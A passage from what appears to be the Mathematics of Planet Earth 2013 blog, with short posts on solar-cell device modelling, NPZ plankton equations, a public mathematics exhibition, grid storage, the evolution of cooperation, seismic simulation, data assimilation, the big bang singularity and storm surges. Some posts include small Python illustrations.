The challenge for physicists designing such cells is to understand how electrons behave at the interfaces between the materials. Physicists use computational device models to design multilayer cells and simulate their behavior. The best device models are both accurate and computationally inexpensive, though in practice, as approximations are made, the models become simpler to evaluate but less accurate. Professor Krich assigned Liang Feng the task of improving the model he’d developed over the previous years, which allowed him to bring his mathematical and physical intuition to bear on the problem. According to Krich:

The most sophisticated previously-existing IBSC device models all made an approximation that the boundary condition at the interface between a standard semiconductor and the intermediate-band semiconductor should be Ohmic, meaning that electrical current flows freely through it. This boundary condition was motivated by an analogous structure, the p-i-n diode, in which it is quite successful. Liang immediately disliked the Ohmic boundary condition for the case. While I gave him the standard explanations as to why it was an appropriate approximation, he came back to me time and again with different arguments as to why the Ohmic condition simply could not be accurate. His own persistence, intuition, and mathematical and computational abilities led him to his somewhat radical hypothesis (i.e., all previously published models for IBSC’s fail in a large range of cases), which he then convincingly proved.
Liang Feng has made a significant and original contribution to improving device modeling for intermediate band solar cells. His achievement is truly his alone, because I actively discouraged him from pursuing it for several weeks. It is no exaggeration to say that this change may significantly aid the development of highly efficient and affordable solar cells.

The outstanding achievement by Liang Feng during his Globalink internship is a great example of how surprising advances in the mathematical sciences are often driven by individual creativity and persistence in the face of skepticism. Through such thinking we consistently discover that theoretical limits are only temporary obstacles on the road of innovation.

Dr. Arvind Gupta,
CEO & Scientific Director
Mitacs

Posted in Mathematics, Renewable Energy | 2 Comments

Ocean Plankton and Ordinary Differential Equations

As applied mathematicians we love differential equations. So, if you are looking for an interesting set of ordinary differential equations (ODEs) with relevance for Planet Earth that is a bit more complicated than the predator-prey models, you might take a look at the so-called NPZ model of biogeochemistry. The N, P, and Z stand for nutrients, phytoplankton, and zooplankton, respectively (or, rather, for the nitrogen concentrations in these species), and the NPZ model describes the evolution of the plankton population in the ocean,
\begin{align*}
\frac{dP}{dt} &= f(I)\, g(N)\, P - h(P)\, Z - i(P)\, P , \\
\frac{dZ}{dt} &= \gamma\, h(P)\, Z - j(Z)\, Z , \\
\frac{dN}{dt} &= - f(I)\, g(N)\, P + (1 - \gamma)\, h(P)\, Z + i(P)\, P + j(Z)\, Z .
\end{align*}
The first equation gives the rate of change of the phytoplankton; phytoplankton increases (first term) due to nutrient uptake ($g$), which is driven by photosynthesis in response to the amount of light available ($f$), and decreases due to zooplankton grazing (second term, $h$) and death and predation by organisms not included in the model (third term, $i$). The second equation gives the rate of change of the zooplankton; zooplankton increases (first term) due to grazing ($h$), but only a fraction $\gamma$ of the harvest is taken up, and decreases due to death and predation by organisms not included in the model (second term, $j$). The third equation gives the rate of change of the nutrients; nutrients are lost due to uptake by phytoplankton (first term, $f$ and $g$) and replenished by the left-over fraction $1-\gamma$ of harvested zooplankton (second term, $h$) and the remains of phytoplankton (third term, $i$) and zooplankton (fourth term, $j$).

Note that the right-hand sides of the equations sum to zero, so the NPZ model conserves the total amount of nitrogen in the system,
\[
(N+P+Z) (t) = (N+P+Z) (0) , \quad t \in \mathbb{R} .
\]
The most common use of NPZ models is for theoretical investigations, to see how the model behaves if different transfer functions are used.
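
For readers who want to play with the system, here is a minimal sketch using one common (but by no means canonical) choice of transfer functions: constant light limitation $f$, Michaelis-Menten uptake $g$, Holling type II grazing $h$, and constant per-capita loss rates $i$ and $j$. All parameter values are invented for illustration; the printed check confirms that total nitrogen is conserved up to integration error.

    import numpy as np
    from scipy.integrate import solve_ivp

    # Illustrative transfer functions (not canonical): constant light limitation,
    # Michaelis-Menten uptake, Holling type II grazing, constant loss rates.
    fI, gamma = 0.8, 0.4
    g = lambda N: N / (0.5 + N)
    h = lambda P: 1.0 * P / (1.0 + P)
    i = lambda P: 0.1
    j = lambda Z: 0.2

    def npz(t, y):
        P, Z, N = y
        dP = fI * g(N) * P - h(P) * Z - i(P) * P
        dZ = gamma * h(P) * Z - j(Z) * Z
        dN = -fI * g(N) * P + (1 - gamma) * h(P) * Z + i(P) * P + j(Z) * Z
        return [dP, dZ, dN]

    sol = solve_ivp(npz, (0, 200), [0.2, 0.1, 4.0], max_step=1.0)
    P, Z, N = sol.y
    print(f"total nitrogen stays between {(P+Z+N).min():.4f} and {(P+Z+N).max():.4f}")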

A survey of the merits and limitations of the NPZ model is given in the review article P. J. S. Franks, “NPZ models of plankton dynamics: Their construction, coupling to physics, and application,” Journal of Oceanography, 58 (2002), pp. 379–387, with an interesting follow-up article by the same author, “Planktonic ecosystem models: perplexing parameterizations and a failure to fail,” Journal of Plankton Research, 31 (2009), pp. 1299–1306. See also the recent textbook by H. Kaper and H. Engler, “Mathematics and Climate,” Chapter 18, OT131, SIAM, Philadelphia (2013).

Posted in Biogeochemistry, Dynamical Systems | Leave a comment

Paleo-Structure Modeling of the Earth’s Mantle

“Paleo-structure modeling of the Earth’s mantle will provide crucial information on the history of plate-driven forces, the material properties of the deep Earth, the temporal evolution of the core-mantle boundary, as well as a deeper understanding of the development of sedimentary basins, thereby advancing us into an era of integrated investigations that will alter our view of the Earth system.” So concludes an article in the December 2013 issue of SIAM News.

Hans-Peter Bunge (Ludwig Maximilian University, Munich, Germany) explains the role mathematical modeling is playing in understanding mantle convection, and how optimization methods are being used to recover the past deep-earth structure.

Posted in Geophysics | Leave a comment

Building a Global Exhibition of Mathematics of Planet Earth

“Making an exhibition is nicer than going to an exhibition” is a sentence that I often use to explain the interest and curiosity of the public towards science today. It shows clearly that many people want to get involved: they are keen to interact, to think along, to participate and to create. New collaborative forms of communication developed by science museums and science exhibitions have proved very successful, and science communicators increasingly work closely with the public to jointly explore and convey insights into scientific topics.

Mathematics of Planet Earth has—from the very beginning—adopted an open approach to fulfill one of the missions of the initiative, which is to “inform the public about the essential role of the mathematical sciences in facing the challenges to our planet.” The open approach started with an invitation to the public—including mathematicians and scientists, artists, and teachers—to develop modules for an exhibition. In 2012 we started the project of the “Competition of virtual modules for an open source exhibition.” Virtual means that the modules, such as films, images, software programs or physical exhibits, had to be submitted in a digital format so that they could be easily reproduced (printed, built) for the exhibition. Not only was everybody invited to contribute; the main idea was also to make the exhibition itself available under a free and open-source license. This way museums and exhibition organizers, schools, universities or any organization can easily stage the exhibition, change it, or extend it.

The winners of the competition

The competition ended in December 2012. We received 29 modules from 11 countries. A jury consisting of international experts in the field of math communication selected three winning modules and prepared a list of modules to be shown at the exhibition. The winner was a physical and interactive exhibit on “The Sphere of the Earth” by Daniel Ramos from the Museu de Matemàtiques de Catalunya. It explains that maps are always wrong and shows the distortion of many map projections using the Tissot indicatrix. The module includes posters, a touch screen installation, a globe, rulers, the continents as physical representations (in various forms) and an activity book for experimenting with the maps yourself! The second winner was “Dune Ash” by Tobias Malkmus and his team, a software program made for exhibitions which allows users to experience the mathematics behind the propagation of volcanic ash. You can place a volcano, define a wind field and choose a dispersion parameter. Then the propagation of the ash cloud is calculated in real time by numerically solving a partial differential equation. In the program you can learn about the mathematical model behind the calculations and also about volcanoes and numerical methods in general.
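
Judging from the description (a wind field plus a dispersion parameter), the equation solved by such a program is of advection-diffusion type, $c_t + \mathbf{u}\cdot\nabla c = \kappa \nabla^2 c$. The exhibit’s actual solver is certainly more sophisticated than the toy explicit upwind step below, which uses an invented wind, diffusivity and source purely to illustrate the equation type.

    import numpy as np

    # Toy 2D advection-diffusion step, c_t + u . grad(c) = kappa * laplacian(c),
    # with invented wind (u, v), diffusivity and source (explicit upwind scheme).
    n, dx, dt = 101, 1.0, 0.2
    kappa = 0.5
    u, v = 1.0, 0.3                       # wind components along the grid axes
    c = np.zeros((n, n))
    c[20, 20] = 100.0                     # the "volcano": an initial ash puff

    for _ in range(60):
        lap = (np.roll(c, 1, 0) + np.roll(c, -1, 0) +
               np.roll(c, 1, 1) + np.roll(c, -1, 1) - 4 * c) / dx**2
        adv = (u * (c - np.roll(c, 1, 0)) + v * (c - np.roll(c, 1, 1))) / dx
        c += dt * (kappa * lap - adv)

    iy, ix = np.unravel_index(np.argmax(c), c.shape)
    print("plume maximum has drifted to grid cell", (iy, ix))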

The third winner was the module “The future of glaciers” by Guillaume Jouvet and his team. It is a very informative and also entertaining short film on the interaction of a glaciologist and a mathematician to answer the question: “How can we predict the future of glaciers?” At the end of the film you can choose a climate scenario for the future and observe how climate affects the glacier, for example in the coming 100 years. The film exists in English, French and German.

Michel Darche and his team from Centre Sciences prepared ten hands-on exhibits which were added to the exhibition. They present topics such as the Coriolis force, satellites, tectonic plates, and erosion and fractal coasts. More information and short videos on these exhibits can be found here.

Open platform, a new competition, first events and exhibitions

All modules were compiled and form the basis of a permanent virtual and real exhibition “Mathematics of Planet Earth” (MPE). The modules are hosted on the IMAGINARY platform of the Mathematisches Forschungsinstitut Oberwolfach (MFO), an international research center based in the Black Forest of Germany. You can find them by following this link or via the website: www.mpe2013.org/exhibition

The MPE exhibition was launched on March 5-8, 2013 at the Headquarters of UNESCO in Paris (see here for pictures and a quick review of this first exhibition). Since then the individual modules have been shown many times at conferences, science days and other events. Two examples of exhibitions where MPE modules have been shown are the exhibition at Bowdoin, USA, and the Formas & Formulas exhibition in Lisbon, Portugal, which also included some of the Portuguese entries to the exhibition, like the software program on rhumb lines and spirals. In the MiMa museum in Oberwolfach, Germany, a touch screen station with four modules (the three winners plus the very inspiring movie “Bottles and Oceanography”) was installed. A bigger exhibition is now planned in collaboration with the Deutsches Technikmuseum in Berlin. It will include detailed information on the partial differential equations used for volcanic ash propagation, the movement of glaciers and the propagation of tsunamis. A new module, called TsunaMath, by team members of INRIA Paris-Rocquencourt, is in development and will be added to the exhibition.

The authors of the competition modules have updated their work several times over the last months. New versions of all winning modules are online, some films have been translated into German, and the author of the image entry “Quasicrystalline Wickerwork,” Uli Gaenshirt, has added two new pictures to his MPE gallery, among them a quasicrystal image in the style of Escher.

A special competition for the MPE exhibition has also been organized in India. Today, November 22, the first Indian MPE exhibition will open in Bangalore at the Visvesvaraya Industrial & Technological Museum. It is organized by the International Centre for Theoretical Sciences (ICTS) and the Center for Applicable Mathematics (CAM) of the Tata Institute of Fundamental Research (TIFR). The exhibition is based on four major themes: Waves, Networks, Optimization and Structures. There will be more than 30 different exhibits, like a tensegrity stool and collapsible structure, a 3D Escher sculpture, an exhibit on networks in the human body (blood / neurons), surface waves, waves on a string, fractal maps, an ecosystem model, and a “walk the function” interactive game! It is planned that these exhibits will be added to the main MPE exhibition platform, so that others can also copy them and use them for their own exhibitions. More details can be found here.

The description texts of all modules have been translated into Spanish by the Royal Spanish Mathematical Society (RSME); you can find them on the Spanish MPE exhibition page.

Ongoing exhibition and invitation to participate

In 2014 several exhibitions will take place; in addition to the museum installation in Berlin, we have already confirmed an exhibition in Seoul for the ICM 2014 congress. Coming back to the first sentence of this blog entry: we cordially invite you to be part of the future MPE exhibitions. The exhibition is open for new contributions and modules; see the open call for contributions. We also need people to support us in writing texts, adding mathematical explanations, translating texts, and establishing contact with museums and exhibition organizers…

If you are interested please get in touch with us by email to submit@mpe2013.org. Let’s continue building an open and global exhibition of Mathematics of Planet Earth!

Posted in MPE Exhibit, Public Event | Leave a comment

Integrating Renewable Energy Sources into the Power Grid

There has been a global push for many years to increase our use of clean, renewable electric energy. State and local governments in many countries have adopted renewable portfolio standards, which require a certain percentage of electric energy production to come from renewable resources. Reliable power system operation requires the continuous balance of supply and demand at every moment in time. However, large-scale integration of variable generation such as solar and wind can significantly alter the dynamics of a grid, because wind and solar resources are intermittent. The power output can fluctuate rapidly for various reasons, such as changing weather and the reliability of a large number of turbines. Generators that use renewable energy to produce electricity often must be sited in locations where wind and solar resources are abundant and sufficient space exists for harnessing them. However, these locations are often far away from the population centers that ultimately consume the energy. The required transmission grids present additional challenges in various aspects, including operational control, economic concerns, and policy-making.

Mathematical models that adequately represent the dynamic behavior of an entire wind or solar plant at the point of interconnection are a critical component for daily analysis and for computer simulations. The analyses and simulations are used by system planners and operators to assess the potential impact of power fluctuations, to perform proper assessments of reliability, and to develop operating strategies that retain system stability and minimize operational cost and capital investment. Traditional models used by the power industry cannot meet this goal for power grids with large-scale integration of intermittent generators, but active research on better models is being carried out by several organizations and institutions. IEEE Power and Energy Magazine has had two issues (Vol. 11(6) and Vol. 9(9)) that focus on several aspects of wind power integration.

Technically, storage is an ideal flexible resource that is quick to respond to fluctuations of generation and demand. Its functions include the provision of energy arbitrage, peak shifting, and storing of otherwise-curtailed wind. In the case of battery storage, it can be deployed close to the load in a modular fashion. However, efficiency issues coupled with high capital costs make the justification of new storage difficult. A report from the American Institute of Mathematics in 2012, arising from a workshop there, dealt with some technical problems related to storage, such as a linear programming model that optimizes the required battery storage size and a nonlinear optimal control problem for batteries of predetermined size. The 17-page report is available here. Review articles can also be found in the IEEE magazine issues mentioned above.
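
The AIM report formulates the storage-sizing problem in more detail; the toy linear program below, with an invented 24-hour wind and load profile and a lossless battery that must absorb every surplus and cover every deficit, only illustrates the flavor of the approach: choose the smallest energy capacity $C$ (and initial charge $s_0$) such that the state of charge always stays between 0 and $C$.

    import numpy as np
    from scipy.optimize import linprog

    # Toy storage-sizing LP with an invented 24-hour profile and a lossless
    # battery: keep the state of charge s0 + cumulative(wind - load) in [0, C],
    # and minimize the capacity C.
    hours = np.arange(24)
    wind = 3.0 + 2.0 * np.sin(2 * np.pi * (hours - 2) / 24)    # MW (assumed)
    load = 3.0 + 1.5 * np.sin(2 * np.pi * (hours - 17) / 24)   # MW (assumed)
    cum = np.cumsum(wind - load)                                # MWh surplus so far

    A_ub, b_ub = [], []
    for q in cum:
        A_ub.append([-1.0, 1.0]); b_ub.append(-q)   # s0 + q <= C
        A_ub.append([0.0, -1.0]); b_ub.append(q)    # s0 + q >= 0
    A_ub.append([-1.0, 1.0]); b_ub.append(0.0)      # s0 <= C

    res = linprog(c=[1.0, 0.0], A_ub=A_ub, b_ub=b_ub,
                  bounds=[(0, None), (0, None)], method="highs")
    C, s0 = res.x
    print(f"minimum capacity ~ {C:.2f} MWh, initial charge ~ {s0:.2f} MWh")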

Power systems are reliability-constrained; i.e., they must perform their intended functions under prescribed system and environmental conditions. Intuitive or rule-of-thumb approaches currently used in the industry will be inadequate for future power systems. More sophisticated quantitative techniques and indices have been developed over many years, and they remain an active focus of research. The work involves many areas of mathematics, including the mathematical concepts and models of reliability, nonlinear optimization, and large-scale simulation. References can easily be found in many journals, such as IEEE Transactions on Power Systems.

Wei Kang
Naval Postgraduate School
Monterey, California

Posted in Optimization, Renewable Energy | Leave a comment

Why We Need Each Other to Succeed

Photo credit: From Martin Nowak’s slides

Martin Nowak gave a public lecture at CRM on November 6. His lecture was part of the activities of the thematic semester “Biodiversity and Evolution,” which takes place this fall.

It is a great scientific problem to understand why biodiversity has become so large on Earth. Mutations allow for the appearance of new species. Selection is an important principle of evolution, but selection works against biodiversity. The biodiversity we observe on Earth is too large to be explained by mutation and selection alone; another force is needed. Martin Nowak identified this other force in 2003: cooperation! His public lecture, “The evolution of cooperation: why we need each other to succeed,” dealt with this theme.

Nowak explained how cooperation is widespread in the living world. Bacteria cooperate for the survival of the species. Eusociality describes the very sophisticated behavior of social insects like ants and bees, where each individual works for the good of the community. Human society is organized around cooperation, from the good Samaritan to the Japanese worker who agreed to work on the cleanup of Fukushima’s nuclear plant: “There are only some of us who can do this job. I’m single and young, and I feel it’s my duty to help settle this problem.” Cells in an organism cooperate and only replicate when it is timely, and cancer occurs when cells stop cooperating.

Nowak then gave a mathematical definition of cooperation. A donor pays a cost, $c$, for a recipient to get a benefit, $b$, greater than $c$. This brings us to the prisoner’s dilemma. Each prisoner has the choice of cooperating, and paying the cost $c$, or defecting. From each prisoner’s point of view, whatever the other does, his better choice is to defect. This means that the rational player will choose to defect. But the other prisoner will reason the same way. Then they will both defect $\ldots$ and get nothing. They could each have gotten $b-c$ if they had behaved irrationally and chosen to cooperate…
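
A minimal numerical illustration of this payoff structure (with arbitrary values of $b$ and $c$) makes the dilemma explicit:

    # Donation-game payoffs: a cooperator pays c so that the other player gains b.
    b, c = 3.0, 1.0            # benefit and cost, b > c (arbitrary values)

    def payoff(me, other):     # strategy: True = cooperate, False = defect
        return (b if other else 0.0) - (c if me else 0.0)

    for me in (True, False):
        for other in (True, False):
            print(f"I {'cooperate' if me else 'defect':>9}, "
                  f"other {'cooperates' if other else 'defects':>10}: "
                  f"my payoff {payoff(me, other):+.1f}")
    # Whatever the other does, defecting earns me c more -- yet mutual
    # cooperation (b - c each) beats mutual defection (0 each).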

Natural selection chooses defection, and help is needed so as to favor cooperators over defectors. There are five mechanisms of cooperation involved in evolution: direct reciprocity, indirect reciprocity, spatial selection, group selection and kin selection.

Direct reciprocity: I help you, you help me. Tit-for-tat is a corresponding good strategy for repeated rounds of the prisoner’s dilemma: I start with cooperation; if you cooperate, I will cooperate; if you defect, then I will defect. This strategy leads to communities of cooperators, but it is unforgiving when there is an error. This leads to a search for better strategies: the generous tit-for-tat strategy incorporates the following difference: if you defect, I will nevertheless cooperate with probability $q = 1 - c/b$. This leads to an evolution of forgiveness. Another good strategy is win-stay, lose-shift. For each of these strategies the lecturer explained under which mathematical conditions the strategy performs well and leads to a community of cooperators.

Indirect reciprocity: I help you, somebody helps me. The experimental confirmation is that, by helping others, one builds one’s reputation: people help those who help others, and helpful people have a higher payoff at the end. Games of indirect reciprocity lead to the evolution of social intelligence. Since individuals need to be able to talk to each other, there should be some form of language and communication in the population.

Spatial selection: an individual interacts with his neighbors; cooperators pay a cost for their neighbors to receive a benefit. Spatial structure favors cooperation if $b/c>k$, where $k$ is the average number of neighbors. This is studied through spatial games, games on graphs (the graph describing a social network), and evolutionary set theory.

Group selection: “There can be no doubt that a tribe including many members who [$\ldots$] are always ready to give aid to each other and to sacrifice themselves for the common good, would be victorious over other tribes; and this would be natural selection.” (Charles Darwin, The Descent of Man, 1871) In group selection, you play the game with others in your group. Offspring are added to the group. Groups divide when reaching a certain size. Groups die. This mechanism favors cooperation if $b/c>1+n/m$, where $n$ is the group size and $m$ the number of groups.

Kin selection occurs among genetically related individuals. This mechanism is related to Hamilton’s rule. Nowak explained the scientific controversy around Hamilton’s rule and inclusive fitness, which he considers a limited and problematic concept.

Direct and indirect reciprocity are essential for understanding the evolution of any pro-social behavior in humans. Citing the lecturer: “But ‘what made us human’ is indirect reciprocity, because it selected for social intelligence and human language.”

Nowak ended his beautiful lecture with an image of the Earth and the following sentence: “We must learn global cooperation $\ldots$ and cooperation for future generations.” This started a passionate period of questions, first in the lecture room, and then around a glass of wine during the vin d’honneur.

Christiane Rousseau

Posted in Public Event, Social Systems | Leave a comment

Mathematics Can Improve Seismic Risk Protection

Mathematical and numerical modeling can be used to better understand the physics of earthquakes, improve the design of site-specific structures and facilities, and enhance seismic-risk maps.

The reliability of existing tools for earthquake and ground-motion prediction, which are based on empirical relations involving earthquake magnitude, source-to-site distance, fault mechanisms and soil properties, has recently been brought into question. Instead, numerical deterministic simulations have become increasingly popular, mainly because they provide sufficiently accurate and reliable ground-motion predictions to quantify the potential risks from earthquakes. By simulating a number of realistic earthquake scenarios, we can obtain reliable estimates of the severity of seismic events and their possible effects on large urban areas—especially important in cases where we have few historical data—and establish collapse-prevention procedures for strategic structures located in the proximity of a fault.

Three-dimensional model of the Northern Italy earthquake (2012). Fault description (left) and computational domain (right; different colors represent different soil properties).

Northern Italy earthquake (2012). Computed peak ground velocity.

SPEED is a certified open-source code for the prediction of near-fault ground motion and the seismic response of three-dimensional structures. SPEED is the product of a collaboration of the Laboratory for Modeling and Scientific Computing (MOX) in the Department of Mathematics and the Department of Civil and Environmental Engineering at the Politecnico di Milano. The code has been tested in a number of realistic seismic events, including the earthquakes in L’Aquila, Italy (2009), Chile (2010), Christchurch in New Zealand (2011), and Northern Italy (2012).

Prof. Alfio Quarteroni
Modeling and Scientific Computing
SB-SMA-MATHICSE-CMCS
Station 8 – EPFL
CH-1015 Lausanne
Switzerland

Posted in Geophysics, Natural Disasters | Leave a comment

(Big) Data Science Meets Climate Science

Internet advertisers and the National Security Agency are not the only ones dealing with the “data deluge” lately. Scientists, too, have access to unprecedented amounts of data, both historical and real-time, from around the world. For instance, using sensors located on ocean buoys and the ocean floor, oceanographers at the National Oceanic and Atmospheric Administration have modeled tsunamis in real time immediately after the detection of large earthquakes. This technology was used to provide important information shortly after the 2011 Tohoku earthquake off the coast of Japan.


Atmospheric Circulation Pattern

The process of incorporating data into models is a nontrivial task and represents a large research area within the fields of weather and climate modeling. While much of the data may be real-time observations, climate scientists also deal with a significant amount of historical data, such as oxygen isotope ratios measured in glacier ice cores. A major question facing climate modelers is how best to incorporate such data into models. As climate models increase in complexity, their results become correspondingly more intricate. Such models represent climate processes spanning multiple spatial and temporal scales and must relate disparate physical phenomena. Data assimilation (DA) is a technique used to combine observations with model forecasts in order to optimize model prediction. DA has many potentially useful applications in climate modeling. Combining observational data with models raises mathematical issues in many areas, including model parameterization, model initialization, and validation of model predictions against observations. For instance, the continued improvement of weather and storm-surge models can be attributed in large part to successful parameterizations and DA, in addition to greater computing power.
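
Operational DA systems (variational methods, ensemble Kalman filters) are far more elaborate, but they all share the same basic analysis step: blending a model forecast with an observation according to their error statistics. The scalar Kalman update below, with invented numbers, is only meant to show that step in its simplest form.

    import numpy as np

    # One scalar Kalman analysis step: blend a forecast x_f (error variance P_f)
    # with an observation y (error variance R). All numbers are invented.
    x_f, P_f = 15.0, 4.0      # forecast (e.g., a temperature) and its variance
    y, R = 13.0, 1.0          # observation and its variance

    K = P_f / (P_f + R)                 # Kalman gain: weight given to the obs
    x_a = x_f + K * (y - x_f)           # analysis (posterior mean)
    P_a = (1.0 - K) * P_f               # analysis error variance

    print(f"gain {K:.2f}: analysis {x_a:.2f} +/- {np.sqrt(P_a):.2f}")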

This week’s Hot Topics Workshop on “Predictability in Earth System Processes” at the Institute for Mathematics and Its Applications (IMA) at the University of Minnesota (November 18-21, 2013) will identify challenges to assimilating data in climate processes, while highlighting mathematical tools used to approach these problems in general. Specific goals of the workshop are to identify DA problems in climate modeling, and to investigate new mathematical approaches to open problems such as:

  • Improving weather forecasts by extending their accuracy to periods of several weeks to months through effective use of DA;
  • Applying uncertainty quantification, via DA, to predictions from Earth system models subject to model errors and observational errors; and
  • Implementing topological data analysis techniques to provide insight into the state space of the model.

This is an exciting workshop, as one of its primary aims is to bring together scientists and mathematicians from a wide range of subdisciplines whose paths might not typically intersect. We anticipate substantial cross-pollination of ideas at this workshop and expect to identify scientific challenges and form interdisciplinary collaborations in order to address a number of mathematical issues in climate research.

Jesse Berwald

On behalf of the Organizers
Thomas Bellsky Arizona State University
Jesse Berwald University of Minnesota, Twin Cities
Lewis Mitchell University of Vermont

Posted in Climate Modeling, Data Assimilation, Workshop Announcement | Leave a comment

Understanding the Big Bang Singularity

If you want to understand the planet Earth, then why not go back to the beginning of the Universe? The big bang is an event that we do not understand. It is thought to have happened about 13.75 billion years ago. What occurred, as we understand it, is mind-blowing. The entire universe as we know it today seems to have come out of nowhere, and very quickly. This is currently described by the theory of inflation, which estimates that between $10^{-36}$ and $10^{-32}$ seconds after the big bang the universe expanded by a factor of $10^{78}$ in volume.

Where did all this energy come from? One way to account for it is offered by the cyclic universe theory, which basically says that prior to the big bang there was another universe that contracted down in a “big crunch,” which then gave rise to the big bang. This process could have occurred over and over, our universe being just one universe in the sequence. The cyclic universe theory has been studied by Gott and Li (1998), by Steinhardt and Turok in many papers using a string theory formulation, and by many others. In the treatment of cyclic universe theories, it is an open problem to understand how one universe could smoothly be continued into another, since the differential equations that describe the inflation become undefined (singular) at the big bang itself.

Let $t$ be a variable denoting time, where the big bang occurs at $t = 0$. For the universe prior to ours, $t < 0$, and for our universe, $t > 0$. A recent paper published by this author shows how to smoothly extend one universe into another through the big bang by making use of a special transformation of the variables in the differential equations. These differential equations are called the Friedmann equations, and under certain assumptions they can be reduced to a system of ordinary differential equations which are undefined at the big bang. It was recently proven in a paper by Belbruno (2013) that a special regularization transformation of the position, velocity, and time variables can be made, in which the differential equations are smooth at the big bang and a unique solution to these differential equations can be found from one universe to another. This solves a problem that had not previously been solved. The paper is entitled “On the Regularizability of the Big Bang Singularity.” The method of using a regularizing transformation had never been used in cosmology; it had previously been applied mainly in classical celestial mechanics. The same methodology was used in an earlier paper by Belbruno and Pretorius (2011) on dynamics about a black hole, entitled “A Dynamical Systems Approach to Schwarzschild Null Geodesics.”
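To see where the singularity enters, here is a standard textbook reduction (not the specific system analyzed in the paper): for a spatially flat universe with scale factor $a(t)$, energy density $\rho$, and a constant equation of state $p = w\rho$, the Friedmann equations give

$$\left(\frac{\dot a}{a}\right)^2 = \frac{8\pi G}{3}\,\rho, \qquad \dot\rho = -3\,\frac{\dot a}{a}\,(\rho + p),$$

so that $\rho \propto a^{-3(1+w)}$ and $a(t) \propto t^{2/(3(1+w))}$ for $w > -1$. As $t \to 0^{+}$ the scale factor vanishes and the density blows up, so the vector field defining the equations is undefined exactly at the big bang; this is the singularity that the regularizing change of variables is designed to remove.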

A particularly intriguing result obtained in this paper is that the unique continuation of one universe into another is possible if and only if a key parameter in the problem, called the equation of state, can be written as a ratio of two integers which are relatively prime. Some new work by this author and BingKan Xue has generalized these results by assuming more physically relevant modeling.

The above image features a painting I did in 2006 of the universe immediately after the big bang. It illustrates the microwave background radiation of the universe, inspired by the Wilkinson Microwave Anisotropy Probe (WMAP) data. The most intense radiation is in red and the least in black-blue. The painting is entitled Microwave Radiation of the Universe (oil on canvas, 30″ x 16″, 2006). Please see my art site.

Edward Belbruno
Department of Astrophysical Sciences
Princeton University

Posted in Astrophysics, Dynamical Systems | Leave a comment

Plowing Fields of Data

In the November 11 issue of The New Yorker there is a fascinating article by Michael Specter about The Climate Corporation, a six-year-old company based in San Francisco whose main business is selling crop insurance to farmers. They do it in a unique way: by crunching vast amounts of meteorological data (50 terabytes per day) about precipitation, temperature, and soil moisture to both analyze current conditions and predict future ones.

Since not everyone has access to The New Yorker, I looked for something else written about the company and found an article from Wired by Marcus Wohlsen and dated September 9, 2012. It actually has more quantitative detail than the first article. You can read it here.

Kent E. Morrison  •  American Institute of Mathematics

Posted in Data, Extreme Events, Weather | Leave a comment

“Mathematics and Climate” — A New Text

Today, allow me to indulge in a bit of self-promotion on the occasion of the publication by the Society for Industrial and Applied Mathematics (SIAM) of a new textbook, “Mathematics and Climate,” co-authored by your friendly MPE Blogmaster, Hans Kaper, and my colleague at Georgetown University, Hans Engler. This afternoon, we are celebrating the publication at a book release party at Georgetown University in Washington, DC. Faculty, students, university administrators, and friends and colleagues of the authors have been invited to the Department of Mathematics and Statistics to join in the celebration.

The book grew out of a course under the same title, “Mathematics and Climate,” taught by the authors at Georgetown University in 2009 for students at the upper-undergraduate and beginning graduate level and will be used as a text for a similar course in the Spring semester of the current academic year.

From the publisher’s announcement:

“This is a timely textbook aimed at students and researchers in mathematics and statistics who are interested in current issues of climate science, as well as at climate scientists who wish to become familiar with qualitative and quantitative methods of mathematics and statistics. The authors emphasize conceptual models that capture important aspects of Earth’s climate system and present the mathematical and statistical techniques that can be applied to their analysis. Topics from climate science include the Earth’s energy balance, temperature distribution, and ocean circulation patterns; among the mathematical and statistical techniques presented in the text are dynamical systems and bifurcation theory, Fourier analysis, and extreme value theory.”

Information about the book can be found here.

Posted in Climate Modeling, Mathematics, Statistics | Leave a comment

Mathematics, Statistics, and Storm Surges

View of Hurricane Sandy. NASA Earth Observatory image by Robert Simmon with data courtesy of the NASA/NOAA GOES Project Science team.

Last week Philadelphia was a suburb of New Jersey. At least it seemed that way, with all the local news media coverage of Hurricane Sandy on the one-year anniversary of its landfall on the Jersey shore on October 29, 2012. The media reports quite naturally focused on the impact of the storm on the region and the progress of the recovery. In many cases the impact was quite tragic, and recovery, while under way, still has a way to go.

Digging deeper, however, one found that there were other long-term issues that reach beyond the Jersey shore. In particular, insurance companies were forced once again to come up with better models for assessing the impact of a storm surge such as Sandy’s. Digging one layer deeper, one finds work done by many statisticians and mathematicians to better model and simulate a storm surge and to better predict the expected cost of damage from such a surge.

One learns that insurance companies, quiet employers of people in the mathematical sciences, are working hard to develop and improve impact-forecasting models for storm surges. For example, Aon Benfield is further developing impact-forecasting models, noting that “it is now more important than ever to respond to these large events by researching, developing and implementing flood catastrophe models that can better analyze the hazard of hurricane coastal and inland riverine flooding.” Work like this is crucial to the efforts of insurers and re-insurers to better perform risk assessment.

Improving models and simulations for storm surge and improving statistical tools for risk assessment are major research topics within the mathematical sciences community. To cite one example, SIAM News covered work by Clint Dawson and his co-workers on modeling hurricane storm surge — Uncertainty Quantification 2012: Modeling Hurricane Storm Surge. This article gives an overview of the mathematical/computational issues in creating high-fidelity simulations of a storm surge.

Of course, the National Oceanic and Atmospheric Administration (NOAA), the agency that plays a major role in weather prediction, is also involved in developing storm surge models in collaboration with research mathematicians and computational scientists. NOAA’s web site provides information on the models being developed.

NOAA’s models also caught the attention of the media; as an example, The Washington Post covered NOAA models in the August 2013 story Hurricane Center Gives Storm Surge Model a Boost.

It is interesting to those involved in the mathematical and computational aspects of these issues to see media coverage that shows the impact of the ongoing research. At the same time, it is somewhat disappointing that this work is often not mentioned in the media reports.

Posted in Natural Disasters, Risk Analysis, Uncertainty Quantification | Leave a comment

Sustainability of Aquatic Ecosystem Networks

The AARMS-CRM workshop on Sustainability of Aquatic Ecosystem Networks was held at the Fredericton Inn in Fredericton, New Brunswick, Canada, October 22-25, 2013. This workshop was the 10th in a series of 11 workshops in the pan-Canadian MPE thematic program on Models and Methods in Epidemiology, Ecology and Public Health.

